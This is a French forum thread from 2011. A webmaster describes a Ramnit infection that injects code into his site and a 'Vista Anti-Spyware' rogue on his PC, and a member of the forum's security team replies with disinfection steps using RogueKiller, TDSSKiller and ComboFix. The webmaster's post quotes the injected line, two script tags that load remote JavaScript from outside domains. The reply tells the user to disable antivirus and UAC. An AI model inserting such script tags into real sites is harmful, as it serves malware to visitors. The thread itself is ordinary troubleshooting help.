Forums Zebulon.fr: Ramnit virus / vista anti spyware - Forums Zebulon.fr

Aller au contenu

Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

Ramnit virus / vista anti spyware Noter : -----

#1 L'utilisateur est hors-ligne   Jeysen 

  • Junior Member
  • Groupe : Membres
  • Messages : 1
  • Inscrit(e) : 26-mars 11

Posté 26 mars 2011 - 06:52

Bonsoir, je pense qu'actuellement mon site web est infecté par un virus , et que celui-ci m'a infecté .
Tout a commencer avec une erreur mysql "session" sur le header de mon site . Certains utilisateurs m'ont reporté que leurs antivirus détectaient le site comme frauduleux . Le site était sur joomla .

J'ai donc arrêter le site, et ai fait développer une nouvelle version de mon site par un codeur .

Le site a été entièrement refait, en partant de zero , sur webspell .
J'ai sauvegarder l'intégralité du ftp + ma base mysql sur mon pc, que j'ai ensuite supprimé sur le serveur ( sauf le répertoire /logs , impossible à supprimer ).

A partir de la, de mon point de vue, il ne pouvait plus avoir de virus sur mon site, vue que tout était supprimé sur le ftp et la base de donné , j'ai donc mis en ligne ma nouvelle version du site . La , de nouveau retour comme quoi le site est infecté par un virus .

Image IPB
Image IPB
Image IPB

Ses alertes ce déclenchent a l'arrivé sur le site ( www.enaxion.net )

Une ligne de code a été trouvé sur l'index.php de mon site :

Citation

<script type="text/javascript" src="http://computerscienceandmedia.com/search.php"></script><script type="text/javascript" src="http://diehlsorchard.com/search.php"></script>


Cette ligne n'est pas présente sur le index.php d'origine ( celui sur mon pc ) , mais s'ajoute lors du transfert vers le ftp . J'en ai déduis que mon pc était infecté .

Une analyse sur le site en question ne donne aucun résultat concluant : VirusTotal - Free Online Virus, Malware and URL Scanner

Le site est-il réellement infecté ? Pourquoi certains antivirus s'affolent lors de l'arrivé sur le site ?
Suis-je infecté par Ramnit ? Comment m'en débarrasser et rendre mon site clean ?

Également, depuis aujourd'hui , je suis infecté par "Vista Anti-Spyware" . L'infection est peut être lié au site infecté ?

Comment me débarrasser de ce virus aussi . Mon anti virus actuel est Comodo internet security . Un scan complet n'a rien donné .

Merci d'avance de l'attention que vous m'accorderez .

edit : j'oubliais , au démarrage, j'ai le dossier "Mes documents" ouvert, et derrière un ecran noir. Je suis obligé de ctrl+alt+suppr et d'exécuter explorer.exe, comment remédier a cela ?

Ce message a été modifié par Jeysen - 26 mars 2011 - 07:13 .

0

PUBLICITÉ

  • Annonces Google
Inscrivez-vous au forum gratuitement et profitez de nombreux avantages !

#2 L'utilisateur est hors-ligne   pear 

  • Devil Member !
  • Groupe : Equipe Sécurité
  • Messages : 16495
  • Inscrit(e) : 22-mars 05

Posté 28 mars 2011 - 09:12

Bonjour,

Avant de commencer, vous devez savoir qu'une désinfection de ramnit n'est pas assuréd du succès.
Vous devez commencer par une sauvegarde de vos données en excluant absolument fichiers exe et Dll.

Télécharger Rogue Killer par Tigzy sur le bureau
Sous Vista/Seven , clic droit -> lancer en tant qu'administrateur
Si le programme bloque, cliquez droit sur le lien ci-dessus->Enregistrer sous..
Dans la fenêtre qui s'ouvre renommez Roguekiller ->Winlogon.exe
Quittez tous tes programmes en cours et lancez le
Image IPB
Quand on vous le demande, tapez 1 et valider
Un rapport (RKreport.txt) apparait sur le bureau
montrant les processus infectieux tués
Copier/Coller son contenu dans la réponse

Télécharger load_tdsskiller de Loup Blanc sur le Bureau
Cet outil est conçu pour automatiser différentes tâches proposées par TDSSKiller, un fix de Kaspersky.
  • Lancer load_tdsskiller en double-cliquant dessus :
    l'outil va se connecter au Net pour télécharger une copie à jour de TDSSKiller et lancer le scan
  • Un message dans la fenêtre noire d'invite de commande vous demandera d'appuyer sur une touche pour continuer
  • Le rapport s'affichera automatiquement : copier-coller son contenu dans la prochaine réponse
    (le fichier est également présent ici : C:\tdsskiller\report.txt)
  • Redémarrer le PC







Combofix est un logiciel très puissant qui ne doit pas être utilisé sans une aide compétente sous peine de risquer des dommages irréversibles.
Veuillez noter que ce logiciel est régulièrement mis à jour et que la version téléchargée sera obsolète dans quelques jours.

Télécharger combofix.exe de sUBs
et sauvegardez le sur le bureau


La console de Récupération
Tout d'abord, Combofix vérifie si la Console de récupération est installée et vous propose de le faire dans le cas contraire.
Certaines infections comme braviax empêcheront son installation.
La Console de récupération Windows vous permettra de démarrer dans un mode spécial de récupération (réparation).
Elle peut être nécessaire si votre ordinateur rencontre un problème après une tentative de nettoyage
C'est une procédure simple, qui ne vous prendra que peu de temps et pourra peut-être un jour vous sauver la mise.
Certaines infections (Rootkit en Mbr)ne peuvent être traitées qu'en utilisant la Console de Récupération,
D'importantes procédures que Combofix est susceptible de lancer ne fonctionneront qu'à la condition que la console de récupération(Sous Xp) soit installée
C'est pourquoi il vous est vivement conseillé d' installer d'abord la Console de Récupération sur le pc .

Les utilisateurs de Windows Vista,Seven peuvent utiliser leur CD Windows pour démarrer en mode Vista Recovery Environment (Win RE)
Cela permettra de réparer le système au cas ou le pc ne redémarrerait plus suite à la désinfection.
Après avoir cliqué sur le lien correspondant à votre version de Windows, vous serez dirigé sur une page:
cliquez sur le bouton Télécharger afin de récupérer le package d'installation sur leBureau:
Ne modifiez pas le nom du fichier
Windows XP Service Pack 2 (SP2) > Microsoft Windows XP Professionnel SP2
Faites un glisser/déposer de ce fichier sur le fichier ComboFix.exe
Image IPB

Suivre les indications à l'écran pour lancer ComboFix et lorsqu'on le demande, accepter le Contrat de Licence d'Utilisateur Final pour installer la Console de Récupération Microsoft.
Après installation,vous devriez voir ce message:
The Recovery Console was successfully installed. puis un rapport nommé CF_RC.txt va s'afficher:


Fermez ou désactivez tous les programmes Antivirus, Antispyware, Pare-feu actifs car ils pourraient perturber le fonctionnement de cet outil
Pour cela:
Démarrer->Exécuter->Msconfig->Démarrage : décochez les protections Antivirus, Antispyware,Teatimer

Cela est absolument nécessaire au succès de la procédure.
Bien évidemment, vous les rétablirez ensuite.


Vous avez téléchargé Combofix.
Double cliquer sur combofix.exe pour le lancer.
Ne pas fermer la fenêtre qui vient de s'ouvrir , le bureau serait vide et cela pourrait entraîner un plantage du programme!
Pour lancer le scan
Connecter tous les disques amovibles (disque dur externe, clé USB…).
Taper sur la touche 1 pour démarrer le scan.
Si pour une raison quelconque, combofix ne se lançait pas,
Sous Vista, désactivez l'UAC
Démarrez en mode sans échec, choisissez le compte Administrateur, lancez Combofix
Si vous avez un message de Combofix disant que votre antivirus est actif alors que vous l'avez désactivé, recommencez la procédure en mode sans échec
Lorsque ComboFix tourne, ne touchez plus du tout à votre ordinateur, vous risqueriez de planter le programme.

Le scan pourrait prendre un certain temps, il y a 50 procédures successives:
Patientez au moins 30 minutes pendant l'analyse.
Si le programme gèle (+ de 30 minutes), fermez le en cliquant le "X" au haut à droite de la fenêtre.
A la fin,,un rapport sera généré : postez en le contenu dans un prochain message.
Si le rapport est trop long, postez le en deux fois.
Il se trouve à c:\combofix.txt

Ce message a été modifié par pear - 28 mars 2011 - 09:13 .

Si ce que tu as à dire ne vaut pas mieux que le silence, tais-toi (Confucius)
0
Page 1 sur 1
  • Vous ne pouvez pas commencer un sujet
  • Vous ne pouvez pas répondre à ce sujet

Similar Topics
  Sujet Commencé par Statistiques Infos sur le dernier message
Sujet chaud (nouvelles réponses) Éradiquer virus et lecture du fichier HijackThis avok 
  • 20 réponses
  • 560 vues
Sujet chaud (nouvelles réponses) Ni incredimail ni Hcontrol après éradication virus rolandro 
  • 44 réponses
  • 1536 vues
Sujet ouvert (nouvelles réponses) Supprimer une alerte Avira (faux virus)
Comment procéder ? 		steppenlux 
  • 1 réponses
  • 88 vues
Sujet ouvert (nouvelles réponses) Analyse ZHPDiag - problème démarrage Vista
Suite éradication virus, problème démarrage 		caledonous 
  • 8 réponses
  • 273 vues
Sujet chaud (nouvelles réponses) [Résolu] Infection détectée sous Windows Vista
Problème d'installation d'office 2010 		mc guill 
  • 37 réponses
  • 1284 vues
Sujet ouvert (nouvelles réponses) Virus ? Trojan ? PC malade stevve 
  • 2 réponses
  • 238 vues
Sujet ouvert (nouvelles réponses) Fichiers locked, virus "gendarmerie nationale" [2] cyrgua 
  • 0 réponses
  • 247 vues
Sujet chaud (nouvelles réponses) Bug Windows ou virus ? zaza57 
  • 17 réponses
  • 357 vues
Sujet chaud (nouvelles réponses) [Résolu] Démarrage Vista
HDD HS 		jimmy44 
  • 27 réponses
  • 869 vues
Sujet fermé Malwarebytes Anti-Malware et Utorrent Yuuki 
  • 6 réponses
  • 253 vues

1 utilisateur(s) en train de lire ce sujet
0 membre(s), 1 invité(s), 0 utilisateur(s) anonyme(s)



    Page officielle Zebulon.fr